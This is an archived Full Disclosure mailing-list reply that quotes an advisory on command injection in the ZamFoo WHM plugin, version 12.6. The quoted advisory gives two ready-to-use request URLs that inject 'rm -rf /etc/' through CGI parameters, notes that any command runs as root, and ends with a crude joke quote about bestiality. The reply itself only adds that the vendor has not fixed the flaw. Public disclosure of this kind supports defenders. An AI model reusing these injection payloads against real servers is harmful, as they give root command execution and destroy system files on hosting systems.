lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <sig.1200cb6826.5364EA73.7070101@lbsd.net>
Date: Sat, 03 May 2014 13:09:07 +0000
From: nkukard+fulldisclosure@...d.net
To: fulldisclosure@...lists.org
Subject: Re: [FD] Zamfoo Multiple Arbitrary Command Executions

On 05/02/2014 11:57 PM, Mad Hax wrote:
>   # Title: Zamfoo Multiple Arbitrary Command Executions
> # Author: Al-Shabaab
> # Vendor Homepage:http://www.zamfoo.com/
> # Version: 12.6
>
> # Intro
>
> The ZamFoo software suite is a series of WHM plugin modules (also known as WHM addon modules) catered towards easing the burden of web hosting providers that sell shared hosting solutions using the Cpanel and WHM hosting platform.
>
> # Exploit Número Uno
>
> https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_restore_zamfoo_backup.cgi?accounttorestore=|rm -rf /etc/${IFS}
>
> # Exploit Número Dos
>
> https://whm:2087/cpsessXXXXXXXXXX/cgi/zamfoo/zamfoo_do_change_site_ip.cgi?accounttochange=|rm -rf /etc/|&newip=127.0.0.1&pattern2=
>
> Both of these exploitz will wipe out the /etc/ dir. Replace command with anything. It all runz as root!
>
> # Greetz
>
> Moktar Zubeyr. Hassan Aweys. Hassan Afrah. HoodedCoder.
>
> # Quote from #Al-Shabaab
>
> <hoodedcoder> Having sex with animals should be legal. I know my cat loves me and I love him; I ask where is the harm? If it wasn't consensual he would claw me and try to get away!

And the author(s) of it refuse to do anything about it (or don't posses 
the skills to) ...
http://www.webhostingtalk.com/showthread.php?t=1275572


_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ